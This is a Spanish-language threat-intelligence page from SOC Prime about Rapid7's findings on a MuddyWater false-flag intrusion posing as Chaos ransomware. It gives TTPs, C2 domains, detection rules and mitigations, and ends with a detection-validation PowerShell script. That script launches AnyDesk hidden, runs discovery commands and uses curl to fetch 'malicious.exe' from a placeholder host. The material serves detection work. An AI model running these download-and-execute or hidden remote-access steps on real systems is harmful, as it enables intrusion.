SOC Prime Bias: Crítico

07 May 2026 15:26 UTC
newspaper icon Rapid7

Ransomware Chaos y la Amenaza Patrocinada por el Estado Detrás de Éste

Author Photo
SOC Prime Team linkedin icon Seguir
Ransomware Chaos y la Amenaza Patrocinada por el Estado Detrás de Éste
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumen

A principios de 2026, lo que inicialmente parecía ser un incidente rutinario de ransomware Chaos se identificó más tarde como una operación de bandera falsa vinculada al grupo asociado al estado iraní MuddyWater, también conocido como Seedworm. En lugar de centrarse en el cifrado de archivos, los atacantes utilizaron Microsoft Teams para ingeniería social, robaron credenciales y tokens MFA, y desplegaron un descargador personalizado junto con un troyano de acceso remoto. La operación reutilizó la infraestructura asociada con MuddyWater, incluyendo un certificado de firma de código, y estaba orientada al robo de datos y al acceso persistente a largo plazo.

Investigación

Los investigadores de Rapid7 reconstruyeron la cadena de intrusión desde el robo de credenciales basado en Teams hasta el uso de herramientas legítimas de administración remota como AnyDesk y DWAgent, seguido de la entrega de ms_upd.exe, que recuperó un RAT personalizado llamado Game.exe. El equipo identificó dominios de comando y control que incluyen moonzonet.com and uploadfiler.com, junto con múltiples direcciones IP asociadas y un certificado de firma previamente vinculado a MuddyWater. El análisis de malware también descubrió comportamientos anti-análisis, un mutex utilizado para imponer una única ejecución, y mecanismos de persistencia que involucran un servicio y archivos ocultos.

Mitigación

Las organizaciones deben implementar protecciones MFA más sólidas, restringir el acceso remoto a escritorios y el uso compartido de pantallas de Teams a cuentas de confianza, y monitorear para detectar herramientas legítimas de acceso remoto que se utilizan en contextos inusuales. Debe aplicarse una lista blanca de aplicaciones a binarios con firma de código, y debe bloquearse la ejecución de archivos no firmados desde directorios accesibles por el usuario. Los equipos de seguridad también deben auditar el uso de certificados regularmente y bloquear los dominios maliciosos y direcciones IP conocidos vinculados a la campaña.

Respuesta

Si se detecta esta actividad, aísle de inmediato los sistemas afectados, revoque las credenciales y tokens MFA comprometidos, y comience una recolección forense completa. Debe bloquearse la infraestructura de comando y control identificada, los servicios de AnyDesk y DWAgent deben eliminarse, y el RAT personalizado debe erradicarse del entorno. También se debe llevar a cabo una búsqueda de amenazas para el mutex ATTRIBUTES_ObjectKernel y cualquier archivo restante almacenado bajo ProgramData.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#aaffaa classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions action_initial_access["<b>Action</b> – <b>T1566 Phishing</b><br/>El adversario envió mensajes de chat maliciosos de Microsoft Teams que atrajeron a los usuarios a una sesión falsa de uso compartido de pantalla de Quick Assist."] class action_initial_access action action_user_exec_link["<b>Action</b> – <b>T1204.001 Ejecución de Usuario: Enlace Malicioso</b><br/>Las víctimas hicieron clic en un enlace malicioso entregado a través de Teams que inició la descarga de <i>ms_upd.exe</i>."] class action_user_exec_link action action_user_exec_copypaste["<b>Action</b> – <b>T1204.004 Ejecución de Usuario: Copiar y Pegar Malicioso</b><br/>Los atacantes instruyeron a los usuarios a copiar y pegar credenciales en archivos de texto localmente creados."] class action_user_exec_copypaste action action_cred_access["<b>Action</b> – <b>T1552.008 Credenciales No Seguras</b> & <b>T1078 Cuentas Válidas</b><br/>Credenciales recolectadas de mensajes de chat y utilizadas para iniciar sesión en sistemas internos."] class action_cred_access action action_auth_mod["<b>Action</b> – <b>T1556.001 Autenticación del Controlador de Dominio</b><br/>Se utilizaron credenciales comprometidas para autenticarse en el controlador de dominio obteniendo acceso privilegiado."] class action_auth_mod action action_discovery["<b>Action</b> – <b>T1082 Descubrimiento de Información del Sistema</b> & <b>T1016 Descubrimiento de Configuración de Red del Sistema</b><br/>El malware recopiló nombre de host, nombre de usuario, dominio, dirección IP a través de ipconfig, whoami, etc."] class action_discovery action action_ingress_transfer["<b>Action</b> – <b>T1105 Transferencia de Herramientas de Ingreso</b><br/><i>ms_upd.exe</i> descargó cargas útiles adicionales (WebView2Loader.dll, Game.exe, visualwincomp.txt) utilizando curl."] class action_ingress_transfer action action_execution["<b>Action</b> – <b>T1059 Interprete de Comandos y Scripting</b><br/>El atacante ejecutó cmd.exe, PowerShell y pythonw.exe para ejecutar los binarios descargados."] class action_execution action action_process_injection["<b>Action</b> – <b>T1055.011 Inyección de Memoria de Ventana Extra</b> & <b>T1055.002 Inyección de Ejecutable Portable</b><br/>pythonw.exe inyectó código en procesos suspendidos para lanzar el RAT de manera encubierta."] class action_process_injection action action_defense_evasion["<b>Action</b> – <b>T1027 Archivos o Información Ofuscados</b> & <b>T1497 Evasión de Virtualización/Sandbox</b><br/>Cargas útiles codificadas XOR, cifradas AES-256-GCM; comprueba DLLs de análisis, identificadores de VM y temporización para evitar la detección en sandbox."] class action_defense_evasion action action_persistence["<b>Action</b> – <b>T1219 Herramientas de Acceso Remoto</b><br/>Despliegue del servicio DWAgent y AnyDesk para control remoto a largo plazo."] class action_persistence action action_lateral_movement["<b>Action</b> – <b>T1563 Secuestro de Sesión de Servicio Remoto (RDP)</b> & <b>T1668 Control Exclusivo</b><br/>Usaron sesiones RDP legítimas para moverse lateralmente y ejecutar comandos en hosts adicionales."] class action_lateral_movement action action_collection_exfil["<b>Action</b> – <b>T1560 Archivado de Datos Recolectados</b> & <b>T1041 Exfiltración Sobre Canal C2</b><br/>Datos archivados en un archivo cifrado XOR y subidos a uploadfiler.com."] class action_collection_exfil action action_c2["<b>Action</b> – <b>T1090 Proxy</b> & <b>T1573 Canal Encriptado</b><br/>Comunicación con infraestructura C2 (moonzonet.com, uploadfiler.com) sobre HTTPS con cargas útiles cifradas."] class action_c2 action %% Nodes u2013 Tools / Files / Processes / Malware file_ms_upd["<b>File</b> – <b>Name</b>: ms_upd.exe<br/><b>Description</b>: Dropper inicial que recupera más cargas útiles."] class file_ms_upd file file_webview ["<b>File</b> – <b>Name</b>: WebView2Loader.dll<br/><b>Description</b>: DLL de soporte para renderizar contenido web."] class file_webview file file_game["<b>File</b> – <b>Name</b>: Game.exe<br/><b>Description</b>: Carga secundaria ejecutada después de la descarga."] class file_game file file_visual["<b>File</b> – <b>Name</b>: visualwincomp.txt<br/><b>Description</b>: Archivo de texto utilizado para datos de configuración."] class file_visual file process_cmd["<b>Process</b> – <b>Name</b>: cmd.exe<br/><b>Purpose</b>: Ejecuta instrucciones de línea de comandos."] class process_cmd process process_ps["<b>Process</b> – <b>Name</b>: PowerShell<br/><b>Purpose</b>: Ejecuta scripts de PowerShell para la ejecución de cargas útiles."] class process_ps process process_python["<b>Process</b> – <b>Name</b>: pythonw.exe<br/><b>Purpose</b>: Ejecuta componentes basados en Python y realiza inyección de procesos."] class process_python process malware_dwaga["<b>Malware</b> – <b>Name</b>: Servicio DWAgent<br/><b>Purpose</b>: Proporciona acceso remoto persistente."] class malware_dwaga malware tool_anydesk["<b>Tool</b> – <b>Name</b>: AnyDesk<br/><b>Description</b>: Utilidad legítima de escritorio remoto utilizada para persistencia y movimiento lateral."] class tool_anydesk tool %% Connections u2013 Flow action_initial_access –>|leads_to| action_user_exec_link action_user_exec_link –>|downloads| file_ms_upd action_user_exec_link –>|leads_to| action_user_exec_copypaste action_user_exec_copypaste –>|provides| action_cred_access action_cred_access –>|enables| action_auth_mod action_auth_mod –>|enables| action_discovery action_discovery –>|triggers| action_ingress_transfer action_ingress_transfer –>|downloads| file_webview action_ingress_transfer –>|downloads| file_game action_ingress_transfer –>|downloads| file_visual action_ingress_transfer –>|leads_to| action_execution action_execution –>|executes| process_cmd action_execution –>|executes| process_ps action_execution –>|executes| process_python process_python –>|injects| action_process_injection action_process_injection –>|facilitates| action_defense_evasion action_defense_evasion –>|enables| action_persistence action_persistence –>|installs| malware_dwaga action_persistence –>|installs| tool_anydesk malware_dwaga –>|supports| action_lateral_movement tool_anydesk –>|supports| action_lateral_movement action_lateral_movement –>|collects| action_collection_exfil action_collection_exfil –>|exfiltrates via| action_c2 %% Styling class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action class file_ms_upd,file_webview,file_game,file_visual file class process_cmd,process_ps,process_python process class malware_dwaga malware class tool_anydesk tool "

Flujo de Ataque

Detecciones

Posible Descubrimiento de Configuración de Red del Sistema (vía línea de comandos)

Equipo de SOC Prime
06 de mayo de 2026

Ver

Uso Posible de PING para Demorar la Ejecución (vía línea de comandos)

Equipo de SOC Prime
06 de mayo de 2026

Ver

Software Alternativo de Acceso / Gestión Remotos (vía creación de proceso)

Equipo de SOC Prime
06 de mayo de 2026

Ver

Uso Sospechoso de CURL (vía línea de comandos)

Equipo de SOC Prime
06 de mayo de 2026

Ver

Descarga de Archivos Suspechosas de IP Directa (vía proxy)

Equipo de SOC Prime
06 de mayo de 2026

Ver

IOCs (HashSha256) para detectar: Confundiendo las Pistas: La Sombra Patrocinada por el Estado Detrás de Chaos Ransomware

Reglas AI de SOC Prime
06 de mayo de 2026

Ver

IOCs (HashSha1) para detectar: Confundiendo las Pistas: La Sombra Patrocinada por el Estado Detrás de Chaos Ransomware

Reglas AI de SOC Prime
06 de mayo de 2026

Ver

IOCs (HashMd5) para detectar: Confundiendo las Pistas: La Sombra Patrocinada por el Estado Detrás de Chaos Ransomware

Reglas AI de SOC Prime
06 de mayo de 2026

Ver

IOCs (SourceIP) para detectar: Confundiendo las Pistas: La Sombra Patrocinada por el Estado Detrás de Chaos Ransomware

Reglas AI de SOC Prime
06 de mayo de 2026

Ver

IOCs (DestinationIP) para detectar: Confundiendo las Pistas: La Sombra Patrocinada por el Estado Detrás de Chaos Ransomware

Reglas AI de SOC Prime
06 de mayo de 2026

Ver

Herramienta de Gestión Remota Sospechosa y Ejecución de Comandos de Descubrimiento [Proceso de Creación de Windows]

Reglas AI de SOC Prime
06 de mayo de 2026

Ver

Detectar Inicios de Sesión Interactivos y Cambios de Configuración de MFA [Registro de Eventos de Seguridad de Microsoft Windows]

Reglas AI de SOC Prime
06 de mayo de 2026

Ver

Ejecución de Simulación

Prerequisito: La Verificación Previa de Telemetría y Línea de Base debe haber pasado.

Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y pretenden generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa del Ataque y Comandos:

    1. Establecer una posición avanzada remota utilizando la herramienta de gestión remota legítima AnyDesk.exe (reflejando el selector “remote-tool”).
    2. Realizar un reconocimiento de red ejecutando ipconfig and whoami desde la misma sesión – satisfaciendo el selector de “comando de descubrimiento”.
    3. Descargar una carga maliciosa utilizando curl invocado a través de cmd.exe, una técnica clásica para “Transferencia de Herramientas de Ingreso” (T1105) e “Interfaz de Línea de Comandos” (T1059).
    4. Ejecutar la carga para completar la cadena de eliminación (no es necesario para la validación de la regla, pero incluido para realismo).

  • Script de Prueba de Regresión:

    # -------------------------------------------------
# Script de Simulación – activa la regla Sigma
# -------------------------------------------------
# 1. Lanzar AnyDesk (simulado – asume que AnyDesk está en PATH)
Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden

# 2. Ejecutar comandos de descubrimiento
$discovery = @(
    "ipconfig /all",
    "whoami",
    "net start"
)
foreach ($cmd in $discovery) {
    cmd.exe /c $cmd | Out-Null
}

# 3. Usar cmd.exe + curl para obtener una carga útil ficticia
$payloadUrl = "http://example.com/malicious.exe"
$outputPath = "$env:TEMPpayload.exe"
$downloadCmd = "curl $payloadUrl -o $outputPath"
cmd.exe /c $downloadCmd

# Opcional: Ejecutar la carga (comentado por seguridad)
# Start-Process -FilePath $outputPath -WindowStyle Hidden
# -------------------------------------------------

  • Comandos de Limpieza:

    # Terminar AnyDesk si se inició
Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force

# Eliminar la carga descargada
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue

# Limpiar cualquier instancia restante de cmd.exe creada por el script
Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force

Fin del Informe

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis